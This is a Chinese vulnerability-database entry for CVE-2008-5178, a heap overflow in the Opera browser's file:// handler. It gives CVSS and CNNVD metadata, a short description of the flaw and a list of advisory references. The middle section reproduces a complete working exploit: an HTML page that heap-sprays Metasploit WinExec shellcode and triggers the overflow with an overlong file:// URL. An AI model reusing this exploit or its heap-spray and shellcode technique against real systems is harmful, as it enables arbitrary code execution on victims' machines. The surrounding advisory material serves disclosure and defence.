Opera Web浏览器'file://'处理器堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116767 漏洞类型 缓冲区溢出
发布时间 2008-11-17 更新时间 2009-03-20
CVE编号 CVE-2008-5178 CNNVD-ID CNNVD-200811-337
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-337
|漏洞详情
Opera是挪威欧朋(OperaSoftware)公司所开发的一款Web浏览器,它支持多窗口浏览、可定制用户界面等。OperaWeb浏览器的'file://'处理器没有正确地验证用户提供输入参数,如果用户受骗打开了恶意的HTML文档并向处理器传送了大约16,500个字符的话,就可以触发堆溢出,导致执行任意指令。请注意无法从Internet调用'file://'处理器,因此访问恶意网页不会触发这个溢出。
|漏洞EXP
<html>
<head><title>uh?</title></head>
<body>
<script>

	
	// k`sOSe 11/15/2008
	// tested on Windows XP SP3, opera 9.62 international version
	// vulnerability found by send9

	// there are many ways to achieve code execution, tons of function pointers to overwrite.
	// maybe there's one more reliable...

	var i=0;
	
	// push es, pop es
	var block = unescape("%u0607%u0607"); 

	// metasploit WinExec c:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

	while (block.length < 81920) block += block;
	var memory = new Array();
	for (;i<1000;i++) memory[i] += (block + shellcode);


	var evil = "file://";

        for(var i = 0; i<16438; i++)
                evil += "X";

	evil += "R."; 

	window.location.replace(evil);

</script>

</body>
</html>

# milw0rm.com [2008-11-17]
|参考资料

来源:XF
名称:opera-filehandler-bo(46653)
链接:http://xforce.iss.net/xforce/xfdb/46653
来源:BID
名称:32323
链接:http://www.securityfocus.com/bid/32323
来源:www.opera.com
链接:http://www.opera.com/support/kb/view/922/
来源:VUPEN
名称:ADV-2008-3183
链接:http://www.frsirt.com/english/advisories/2008/3183
来源:GENTOO
名称:GLSA-200903-30
链接:http://security.gentoo.org/glsa/glsa-200903-30.xml
来源:SECUNIA
名称:34294
链接:http://secunia.com/advisories/34294
来源:SECUNIA
名称:32752
链接:http://secunia.com/advisories/32752
来源:OSVDB
名称:49882
链接:http://osvdb.org/49882
来源:MILW0RM
名称:7135
链接:http://milw0rm.com/exploits/7135
来源:BUGTRAQ
名称:20081117Opera9.6xfile://overflow
链接:http://archives.neohapsis.com/archives/bugtraq/2008-11/0110.html